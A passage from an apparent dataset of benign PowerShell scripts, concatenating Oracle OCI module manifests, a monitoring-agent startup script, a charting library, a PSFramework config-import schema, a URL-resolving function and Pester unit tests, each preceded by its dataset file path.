'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/sample_24_61.ps1
sample_24_61.ps1
$env:CONFIG_PATH = ".\config/config.test.json" $serviceConfig = Get-Content -Raw -Path $env:CONFIG_PATH | ConvertFrom-Json Write-Host "Set variables for monitoring agent..." $env:MONITORING_BUILD_VERSION = "0.0.0" $env:MONITORING_CONFIG_VERSION = $serviceConfig.'Geneva:ConfigVersion' $env:MONITORING_GCS_ACCOUNT = $serviceConfig.'Geneva:Account' $env:MONITORING_GCS_CERTSTORE = "LOCAL_MACHINE\MY" $env:MONITORING_GCS_ENVIRONMENT = $serviceConfig.'Geneva:Environment' $env:MONITORING_GCS_NAMESPACE = $serviceConfig.'Geneva:Namespace' $env:MONITORING_GCS_THUMBPRINT = $serviceConfig.'Geneva:Thumbprint' $env:MONITORING_MDM_ACCOUNT = $serviceConfig.'Geneva:Mdm:Account' $env:MONITORING_MDM_NAMESPACE = $serviceConfig.'Geneva:Mdm:Namespace' $env:MONITORING_ROLE = $serviceConfig.'Deployment:Role' $env:MONITORING_ROLE_INSTANCE = $serviceConfig.'Geneva:RoleInstance' $env:MONITORING_ROLE_DEPLOYMENT_REGION = $serviceConfig.'Geneva:RoleDeploymentRegion' $env:MONITORING_TENANT= $serviceConfig.'Geneva:Tenant' $env:MONITORING_GCS_REGION = $serviceConfig.'Geneva:GcsRegion' Write-Host "Set variables for monitoring agent successfully. Environment variables:" Get-Childitem env: # To use authentic Geneva cert, uncomment below # $secretConfigPath = $env:CONFIG_PATH # $appEntryPoint = "./$projectname$.exe --configPath $($env:CONFIG_PATH)" # ./CosmicStartupScripts/OwinCosmicEntryPoint.ps1 ` # -AppEntryPoint $appEntryPoint ` # -SecretsConfigPath $secretConfigPath ` # -MonitoringAgentCertName "GENEVA" ` # -MtlsPorts 8080 # To use dummy Geneva cert, uncomment below Import-PfxCertificate -FilePath ./cosmicvsix-dummy-geneva.pfx -CertStoreLocation Cert:\LocalMachine\My [Environment]::SetEnvironmentVariable("Secret_GENEVA_Thumbprint", $serviceConfig.'Geneva:Thumbprint', "Machine") Import-Module ./CosmicStartupScripts/MonitoringAgent $monitoringAgent = New-MonitoringAgent "GENEVA" $monitoringAgent.Start() ./$projectname$.exe --configPath $($env:CONFIG_PATH)
combined_dataset/train/non-malicious/ModuleWriteError_1.psm1.ps1
ModuleWriteError_1.psm1.ps1
################################################################################ ## Script Name: Module Write Error ## Created On: 1/7/2010 ## Author: Thell Fowler ## Tribute: Joel 'Jaykul' Bennet ## File: ModuleWriteError.psm1 ## Usage: import-module \\Path\\to\\module\\ModuleWriteError.psm1 ## Version: 1.0.0 ## ## Purpose: Provides a New-ModuleError functions for the creation of an ## error record that is populated and formatted with an ## imported module's advanced function information. ## ## Reasoning: Informational error messages generated from 'Write-Error' do ## not truly represent the current function in some cases and ## do not inform the user of Module specific details. ## Usage of $PSCmdlet.WriteError an error record from ## New-ModuleError can resolve that. ## ## Requirements: PowerShell Version 2 ## ModuleWriteError.psd1 ## FunctionInfo.types.ps1xml ## Last Updated: 01/13/2010 ## History: ## 1.0.1 01/13/2010 - Removed nested prompt call remaining from testing. ## 1.0.0 01/13/2010 - Initial version. ## ## ################################################################################ #requires -version 2.0 Set-StrictMode -Version 2 function New-ModuleExceptionClass{ [CmdletBinding()] param([string]$exceptionType) # Generic Default Exception Class for use with WriteError output. $GenericModuleExceptionSource = @" using System; public class $($exceptionType) : System.ApplicationException { public $($exceptionType)() { } public $($exceptionType)(string message) : base(message) { } public $($exceptionType)(string message, Exception innerException) : base(message, innerException) { } } "@ # Suppresses warning: Generated type defines no public methods of it's own. Add-Type -TypeDefinition $GenericModuleExceptionSource -IgnoreWarnings -warningaction silentlycontinue } function New-ModuleError { <# .SYNOPSIS Create an error record that is populated and formatted to provide data that is contextual to an imported module's advanced functions. .DESCRIPTION Informational error messages generated from 'Write-Error' do not truly represent the current function in some cases and do not inform the user of Module specific details. When using $PSCmdlet.WriteError though that data can be populated into the error record. .EXAMPLE $PSCmdlet.WriteError(( New-ModuleError ` "Cannot get `'$Name`' because it does not exist." )) .OUTPUTS [ErrorRecord] #> [CmdletBinding()] param( [Parameter(Position=0, Mandatory=$true)] [string]$message, [string]$identifierText = $("ErrorNotSpecified"), [System.Management.Automation.ErrorCategory]$ErrorCategory = $("NotSpecified"), [PSObject]$targetObject, [string]$exceptionType = $($null), [Exception]$innerException ) Begin { # These are used in building the error record. $MyCommandCaller = ((get-pscallstack)[1].InvocationInfo.MyCommand) $MyCallersModule = ($MyCommandCaller.ModuleName) if ( $exceptionType.Length -eq 0 ) { $exceptionType = "$($MyCallersModule)ModuleException" } elseif ( ( "$($exceptionType)" -as [type] -eq $null ) -and ( $exceptionType -ne "$($MyCallersModule)ModuleException" ) ) { $exceptionType = [AppDomain]::CurrentDomain.GetAssemblies() | %{$_.GetExportedTypes()} | ?{ $_.Name -eq "$($exceptionType)" -and $_.IsSubclassOf( [System.Exception] ) } if ( $exceptionType -as [type] -eq $null ) { $exceptionType = "$($MyCallersModule)ModuleException" } } if ( ( $exceptionType -eq "$($MyCallersModule)ModuleException" ) -and ( "$($exceptionType)" -as [type] -eq $null) ) { New-ModuleExceptionClass "$($MyCallersModule)ModuleException" } } Process { if ($innerException) { $MyErrorRecord = (new-object System.Management.Automation.ErrorRecord( (new-object $exceptionType("$($message)", $innerException)), "$($identifierText), Module : $($MyCommandCaller.ModuleName)\\$($MyCommandCaller.InternalName)", $ErrorCategory, $targetObject) ) } else { $MyException = new-object $exceptionType $message $MyErrorRecord = (new-object System.Management.Automation.ErrorRecord( $MyException, "$($identifierText), Module : $($MyCommandCaller.ModuleName)\\$($MyCommandCaller.InternalName)", $ErrorCategory, $targetObject) ) } $MyErrorRecord.CategoryInfo.Activity = "$($MyCommandCaller.Name)" Write-Output $MyErrorRecord } End { } } Export-ModuleMember New-ModuleError
combined_dataset/train/non-malicious/sample_21_99.ps1
sample_21_99.ps1
# # Module manifest for module 'OCI.PSModules.Secrets' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Secrets.dll' # Version number of this module. ModuleVersion = '82.0.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = '9e5d79e8-8286-48b7-ab80-a55d8a9440d3' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Secrets Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '82.0.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Secrets.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Get-OCISecretsSecretBundle', 'Get-OCISecretsSecretBundleByName', 'Get-OCISecretsSecretBundleVersionsList' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Secrets' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/sample_62_63.ps1
sample_62_63.ps1
# # Module manifest for module 'OCI.PSModules.Licensemanager' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Licensemanager.dll' # Version number of this module. ModuleVersion = '86.0.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = 'd5ea5795-15c4-465d-b62e-2951d092514b' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Licensemanager Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '86.0.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Licensemanager.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Get-OCILicensemanagerBulkUploadTemplate', 'Get-OCILicensemanagerConfiguration', 'Get-OCILicensemanagerLicenseMetric', 'Get-OCILicensemanagerLicenseRecord', 'Get-OCILicensemanagerLicenseRecordsList', 'Get-OCILicensemanagerProductLicense', 'Get-OCILicensemanagerProductLicenseConsumersList', 'Get-OCILicensemanagerProductLicensesList', 'Get-OCILicensemanagerTopUtilizedProductLicensesList', 'Get-OCILicensemanagerTopUtilizedResourcesList', 'Invoke-OCILicensemanagerBulkUploadLicenseRecords', 'New-OCILicensemanagerLicenseRecord', 'New-OCILicensemanagerProductLicense', 'Remove-OCILicensemanagerLicenseRecord', 'Remove-OCILicensemanagerProductLicense', 'Update-OCILicensemanagerConfiguration', 'Update-OCILicensemanagerLicenseRecord', 'Update-OCILicensemanagerProductLicense' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Licensemanager' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/sample_44_58.ps1
sample_44_58.ps1
> lint > eslint . --ext .ts C:\Users\pfwobcke\.vscode\extensions\vscode-vdf\apps\extension\desktop\servers\HUDAnimations\src\server.ts 6:7 error 'server' is assigned a value but never used @typescript-eslint/no-unused-vars C:\Users\pfwobcke\.vscode\extensions\vscode-vdf\apps\extension\desktop\servers\Popfile\src\server.ts 6:7 error 'server' is assigned a value but never used @typescript-eslint/no-unused-vars C:\Users\pfwobcke\.vscode\extensions\vscode-vdf\apps\extension\desktop\servers\VDF\src\server.ts 6:7 error 'server' is assigned a value but never used @typescript-eslint/no-unused-vars C:\Users\pfwobcke\.vscode\extensions\vscode-vdf\apps\extension\desktop\servers\VMT\src\server.ts 6:7 error 'server' is assigned a value but never used @typescript-eslint/no-unused-vars ✖ 4 problems (4 errors, 0 warnings) npm ERR! Lifecycle script `lint` failed with error: npm ERR! Error: command failed npm ERR! in workspace: desktop-servers npm ERR! at location: C:\Users\pfwobcke\.vscode\extensions\vscode-vdf\apps\extension\desktop\servers
combined_dataset/train/non-malicious/LibraryChart_1.ps1
LibraryChart_1.ps1
# --------------------------------------------------------------------------- ### <Script> ### <Author> ### Chad Miller ### </Author> ### <Description> ### Defines functions for wokring with Microsoft Chart Control for .NET 3.5 Framework ### Pipe output of Powershell command to Out-Chart function and specify chart type ### Chart will display in form or save to image file ### Real-time charts are supported by passing in a script block ### My thanks to Richard MacDonald for his wonderful post on Charting with PowerShell ### http://blogs.technet.com/richard_macdonald/archive/2009/04/28/3231887.aspx ### Note: Requires NET Framework 3.5 and Microsoft Chart Controls for Microsoft .NET Framework 3.5 ### </Description> ### <Usage> ### . ./LibraryChart.ps1 ### -------------------------- EXAMPLE 1 -------------------------- ### Get-Process | Sort-Object -Property WS | Select-Object Name,WS -Last 5 | out-chart -xField 'name' -yField 'WS' ### ### This command will produce a default column chart ### ### -------------------------- EXAMPLE 2 -------------------------- ### Get-Process | Sort-Object -Property WS | Select-Object Name,WS -Last 5 | out-chart -xField 'name' -yField 'WS' -filename 'c:\\users\\u00\\documents\\process.png' ### This command will output the chart to a file ### ### -------------------------- EXAMPLE 3 -------------------------- ### Get-Process | Sort-Object -Property WS | Select-Object Name,WS -Last 5 | out-chart -xField 'name' -yField 'WS' -chartType 'Pie' ### ### This command will produce a pie chart ### ### -------------------------- EXAMPLE 4 -------------------------- ### out-chart -xField 'name' -yField 'WS' -scriptBlock {Get-Process | Sort-Object -Property WS | Select-Object Name,WS -Last 1} -chartType 'line' ### ### This command will produce a real-time line chart ### ### </Usage> ### </Script> # -------------------------------------------------------------------------- [void][Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms") [void][Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms.DataVisualization") ####################### function New-Chart { param ([int]$width,[int]$height,[int]$left,[int]$top,$chartTitle) # create chart object $global:Chart = New-object System.Windows.Forms.DataVisualization.Charting.Chart $global:Chart.Width = $width $global:Chart.Height = $height $global:Chart.Left = $left $global:Chart.Top = $top # create a chartarea to draw on and add to chart $chartArea = New-Object System.Windows.Forms.DataVisualization.Charting.ChartArea $global:chart.ChartAreas.Add($chartArea) [void]$global:Chart.Titles.Add($chartTitle) # change chart area colour $global:Chart.BackColor = [System.Drawing.Color]::Transparent } #New-Chart ####################### function New-BarColumnChart { param ([hashtable]$ht, $chartType='Column', $chartTitle,$xTitle,$yTitle, [int]$width,[int]$height,[int]$left,[int]$top,[bool]$asc) New-Chart -width $width -height $height -left $left -top $top -chartTile $chartTitle $chart.ChartAreas[0].AxisX.Title = $xTitle $chart.ChartAreas[0].AxisY.Title = $yTitle [void]$global:Chart.Series.Add("Data") $global:Chart.Series["Data"].Points.DataBindXY($ht.Keys, $ht.Values) $global:Chart.Series["Data"].ChartType = [System.Windows.Forms.DataVisualization.Charting.SeriesChartType]::$chartType if ($asc) { $global:Chart.Series["Data"].Sort([System.Windows.Forms.DataVisualization.Charting.PointSortOrder]::Ascending, "Y") } else { $global:Chart.Series["Data"].Sort([System.Windows.Forms.DataVisualization.Charting.PointSortOrder]::Descending, "Y") } $global:Chart.Series["Data"]["DrawingStyle"] = "Cylinder" $global:chart.Series["Data"].IsValueShownAsLabel = $true $global:chart.Series["Data"]["LabelStyle"] = "Top" } #New-BarColumnChart ####################### function New-LineChart { param ([hashtable]$ht,$chartTitle, [int]$width,[int]$height,[int]$left,[int]$top) New-Chart -width $width -height $height -left $left -top $top -chartTile $chartTitle [void]$global:Chart.Series.Add("Data") # $global:Chart.Series["Data"].Points.AddXY($(get-date), $($ht.Values)) $global:Chart.Series["Data"].Points.DataBindXY($ht.Keys,$ht.Values) #$global:Chart.Series["Data"].XValueType = [System.Windows.Forms.DataVisualization.Charting.ChartValueType]::Time #$global:Chart.chartAreas[0].AxisX.LabelStyle.Format = "hh:mm:ss" #$global:Chart.chartAreas[0].AxisX.LabelStyle.Interval = 1 #$global:Chart.chartAreas[0].AxisX.LabelStyle.IntervalType = [System.Windows.Forms.DataVisualization.Charting.DateTimeIntervalType]::Seconds $global:Chart.Series["Data"].ChartType = [System.Windows.Forms.DataVisualization.Charting.SeriesChartType]::Line #$global:chart.Series["Data"].IsValueShownAsLabel = $false } #New-LineChart ####################### function New-PieChart { param ([hashtable]$ht,$chartTitle, [int]$width,[int]$height,[int]$left,[int]$top) New-Chart -width $width -height $height -left $left -top $top -chartTile $chartTitle [void]$global:Chart.Series.Add("Data") $global:Chart.Series["Data"].Points.DataBindXY($ht.Keys, $ht.Values) $global:Chart.Series["Data"].ChartType = [System.Windows.Forms.DataVisualization.Charting.SeriesChartType]::Pie $global:Chart.Series["Data"]["PieLabelStyle"] = "Outside" $global:Chart.Series["Data"]["PieLineColor"] = "Black" #$global:chart.Series["Data"].IsValueShownAsLabel = $true #$global:chart.series["Data"].Label = "#PERCENT{P1}" #$legend = New-object System.Windows.Forms.DataVisualization.Charting.Legend #$global:Chart.Legends.Add($legend) #$Legend.Name = "Default" } #New-PieChart ####################### function Remove-Points { param($name='Data',[int]$maxPoints=200) while ( $global:chart.Series["$name"].Points.Count > $maxPoints ) { $global:chart.Series["$name"].Points.RemoveAT(0) } } #Add-Series ####################### function Out-Form { param($interval,$scriptBlock,$xField,$yField) # display the chart on a form $global:Chart.Anchor = [System.Windows.Forms.AnchorStyles]::Bottom -bor [System.Windows.Forms.AnchorStyles]::Right -bor [System.Windows.Forms.AnchorStyles]::Top -bor [System.Windows.Forms.AnchorStyles]::Left $Form = New-Object Windows.Forms.Form $Form.Text = 'PowerCharts' $Form.Width = 600 $Form.Height = 600 $Form.controls.add($global:Chart) if ($scriptBlock -is [ScriptBlock]) { if (!($xField -or $yField)) { throw 'xField and yField required with scriptBlock parameter.' } $timer = New-Object System.Windows.Forms.Timer $timer.Interval = $interval $timer.add_Tick({ $ht = &$scriptBlock | ConvertTo-HashTable $xField $yField if ($global:Chart.Series["Data"].ChartTypeName -eq 'Line') { Remove-Points $ht | foreach { $global:Chart.Series["Data"].Points.AddXY($($_.Keys), $($_.Values)) } } else { $global:Chart.Series["Data"].Points.DataBindXY($ht.Keys, $ht.Values) } $global:chart.ResetAutoValues() $global:chart.Invalidate() }) $timer.Enabled = $true $timer.Start() } $Form.Add_Shown({$Form.Activate()}) $Form.ShowDialog() } #Out-Form ####################### function Out-ImageFile { param($fileName,$fileformat) $global:Chart.SaveImage($fileName,$fileformat) } ####################### ### ConvertTo-Hashtable function based on code by Jeffery Snover ### http://blogs.msdn.com/powershell/archive/2008/11/23/poshboard-and-convertto-hashtable.aspx ####################### function ConvertTo-Hashtable { param([string]$key, $value) Begin { $hash = @{} } Process { $thisKey = $_.$Key $hash.$thisKey = $_.$Value } End { Write-Output $hash } } #ConvertTo-Hashtable ####################### function Out-Chart { param( $xField=$(throw 'Out-Chart:xField is required'), $yField=$(throw 'Out-Chart:yField is required'), $chartType='Column',$chartTitle, [int]$width=500, [int]$height=400, [int]$left=40, [int]$top=30, $filename, $fileformat='png', [int]$interval=1000, $scriptBlock, [switch]$asc ) Begin { $ht = @{} } Process { if ($_) { $thisKey = $_.$xField $ht.$thisKey = $_.$yField } } End { if ($scriptBlock) { $ht = &$scriptBlock | ConvertTo-HashTable $xField $yField } switch ($chartType) { 'Bar' {New-BarColumnChart -ht $ht -chartType $chartType -chartTitle $chartTitle -width $width -height $height -left $left -top $top -asc $($asc.IsPresent)} 'Column' {New-BarColumnChart -ht $ht -chartType $chartType -chartTitle $chartTitle -width $width -height $height -left $left -top $top -asc $($asc.IsPresent)} 'Pie' {New-PieChart -chartType -ht $ht -chartTitle $chartTitle -width $width -height $height -left $left -top $top } 'Line' {New-LineChart -chartType -ht $ht -chartTitle $chartTitle -width $width -height $height -left $left -top $top } } if ($filename) { Out-ImageFile $filename $fileformat } elseif ($scriptBlock ) { Out-Form $interval $scriptBlock $xField $yField } else { Out-Form } } } #Out-Chart
combined_dataset/train/non-malicious/440.ps1
440.ps1
Register-PSFConfigSchema -Name Default -Schema { param ( [string] $Resource, [System.Collections.Hashtable] $Settings ) $Peek = $Settings["Peek"] $ExcludeFilter = $Settings["ExcludeFilter"] $IncludeFilter = $Settings["IncludeFilter"] $AllowDelete = $Settings["AllowDelete"] $EnableException = $Settings["EnableException"] Set-Location -Path $Settings["Path"] $PassThru = $Settings["PassThru"] function Read-PsfConfigFile { [CmdletBinding()] param ( [Parameter(Mandatory = $true, ParameterSetName = 'Path')] [string] $Path, [Parameter(Mandatory = $true, ParameterSetName = 'Weblink')] [string] $Weblink, [Parameter(Mandatory = $true, ParameterSetName = 'RawJson')] [string] $RawJson ) function New-ConfigItem { [Diagnostics.CodeAnalysis.SuppressMessageAttribute("PSUseShouldProcessForStateChangingFunctions", "")] [CmdletBinding()] param ( $FullName, $Value, $Type, [switch] $KeepPersisted, [switch] $Enforced, [switch] $Policy ) [pscustomobject]@{ FullName = $FullName Value = $Value Type = $Type KeepPersisted = $KeepPersisted Enforced = $Enforced Policy = $Policy } } function Get-WebContent { [CmdletBinding()] param ( [string] $WebLink ) $webClient = New-Object System.Net.WebClient $webClient.Encoding = [System.Text.Encoding]::UTF8 $webClient.DownloadString($WebLink) } if ($Path) { if (-not (Test-Path $Path)) { return } $data = Get-Content -Path $Path -Encoding UTF8 -Raw | ConvertFrom-Json -ErrorAction Stop } if ($Weblink) { $data = Get-WebContent -WebLink $Weblink | ConvertFrom-Json -ErrorAction Stop } if ($RawJson) { $data = $RawJson | ConvertFrom-Json -ErrorAction Stop } foreach ($item in $data) { if (-not $item.Version) { New-ConfigItem -FullName $item.FullName -Value ([PSFramework.Configuration.ConfigurationHost]::ConvertFromPersistedValue($item.Value, $item.Type)) } if ($item.Version -eq 1) { if ((-not $item.Style) -or ($item.Style -eq "Simple")) { New-ConfigItem -FullName $item.FullName -Value $item.Data } else { if (($item.Type -eq "Object") -or ($item.Type -eq 12)) { New-ConfigItem -FullName $item.FullName -Value $item.Value -Type "Object" -KeepPersisted } else { New-ConfigItem -FullName $item.FullName -Value ([PSFramework.Configuration.ConfigurationHost]::ConvertFromPersistedValue($item.Value, $item.Type)) } } } } } try { if ($Resource -like "http*") { $data = Read-PsfConfigFile -Weblink $Resource -ErrorAction Stop } else { $pathItem = $null try { $pathItem = Resolve-PSFPath -Path $Resource -SingleItem -Provider FileSystem } catch { } if ($pathItem) { $data = Read-PsfConfigFile -Path $pathItem -ErrorAction Stop } else { $data = Read-PsfConfigFile -RawJson $Resource -ErrorAction Stop } } } catch { Stop-PSFFunction -Message "Failed to import $Resource" -EnableException $EnableException -Tag 'fail', 'import' -ErrorRecord $_ -Continue -Target $Resource -Cmdlet $Settings["Cmdlet"] } :element foreach ($element in $data) { foreach ($exclusion in $ExcludeFilter) { if ($element.FullName -like $exclusion) { continue element } } if ($IncludeFilter) { $isIncluded = $false foreach ($inclusion in $IncludeFilter) { if ($element.FullName -like $inclusion) { $isIncluded = $true break } } if (-not $isIncluded) { continue } } if ($Peek) { $element } else { try { if (-not $element.KeepPersisted) { Set-PSFConfig -FullName $element.FullName -Value $element.Value -EnableException -AllowDelete:$AllowDelete -PassThru:$PassThru } else { Set-PSFConfig -FullName $element.FullName -PersistedValue $element.Value -PersistedType $element.Type -AllowDelete:$AllowDelete -PassThru:$PassThru } } catch { Stop-PSFFunction -Message "Failed to set '$($element.FullName)'" -ErrorRecord $_ -EnableException $EnableException -Tag 'fail', 'import' -Continue -Target $Resource -Cmdlet $Settings["Cmdlet"] } } } }
combined_dataset/train/non-malicious/Get-HttpResponseUri.ps1
Get-HttpResponseUri.ps1
function Get-HttpResponseUri { #.Synopsis # Fetch the HEAD for a url and return the ResponseUri. #.Description # Does a HEAD request for a URL, and returns the ResponseUri. This is useful for resolving (in a service-independent way) shortened urls. #.Parameter ShortUrl # A (possibly) shortened URL to be resolved to its redirect location. PARAM( [Parameter(Position=0,Mandatory=$true,ValueFromPipeline=$true)] [Alias("Uri","Url")] [string]$ShortUrl ) $req = [System.Net.HttpWebRequest]::Create($ShortUrl) $req.Method = "HEAD" $response = $req.GetResponse() Write-Output $response.ResponseUri $response.Close() # clean up like a good boy }
combined_dataset/train/non-malicious/377.ps1
377.ps1
Describe "Import-PSFConfig Unit Tests" -Tag "CI", "Pipeline", "Unit" { BeforeAll { Get-PSFConfig -Module Import-PSFConfig -Force | ForEach-Object { $null = [PSFramework.Configuration.ConfigurationHost]::Configurations.Remove($_.FullName) } Get-PSFConfig -FullName config.import.test | ForEach-Object { $null = [PSFramework.Configuration.ConfigurationHost]::Configurations.Remove($_.FullName) } Get-PSFConfig -FullName MetaJson | ForEach-Object { $null = [PSFramework.Configuration.ConfigurationHost]::Configurations.Remove($_.FullName) } } AfterAll { Get-PSFConfig -Module Import-PSFConfig -Force | ForEach-Object { $null = [PSFramework.Configuration.ConfigurationHost]::Configurations.Remove($_.FullName) } Get-PSFConfig -FullName config.import.test | ForEach-Object { $null = [PSFramework.Configuration.ConfigurationHost]::Configurations.Remove($_.FullName) } Get-PSFConfig -FullName MetaJson | ForEach-Object { $null = [PSFramework.Configuration.ConfigurationHost]::Configurations.Remove($_.FullName) } } It "Should have the designed for parameters & sets" { (Get-Command Import-PSFConfig).ParameterSets.Name | Should -Be 'Path', 'ModuleName' foreach ($key in (Get-Command Import-PSFConfig).Parameters.Keys) { $key | Should -BeIn 'Path', 'ModuleName', 'ModuleVersion', 'Scope', 'Schema', 'IncludeFilter', 'ExcludeFilter', 'Peek', 'AllowDelete', 'PassThru', 'EnableException', 'Verbose', 'Debug', 'ErrorAction', 'WarningAction', 'InformationAction', 'ErrorVariable', 'WarningVariable', 'InformationVariable', 'OutVariable', 'OutBuffer', 'PipelineVariable' } } Describe "Integrity of imported data is verified" { Set-Content -Path testdrive:\Import-PSFConfig.Phase1.Config1.json -Value @' { "FullName": "import-psfconfig.phase1.setting1", "Type": 3, "Version": 1, "Value": "42", "Style": "default" } '@ It "Should correctly import the configuration Json from file" { Get-Content 'testdrive:\Import-PSFConfig.Phase1.Config1.json' | Select-String '"Version": 1' | Should -Not -BeNullOrEmpty Import-PSFConfig -Path testdrive:\Import-PSFConfig.Phase1.Config1.json Get-PSFConfigValue -FullName 'import-psfconfig.phase1.setting1' | Should -Be 42 (Get-PSFConfigValue -FullName 'import-psfconfig.phase1.setting1').GetType().FullName | Should -Be 'System.Int32' } Set-Content -Path testdrive:\Import-PSFConfig.Phase1.Config2.json -Value @' { "FullName": "import-psfconfig.phase1.setting2", "Version": 1, "Data": 23 } '@ It 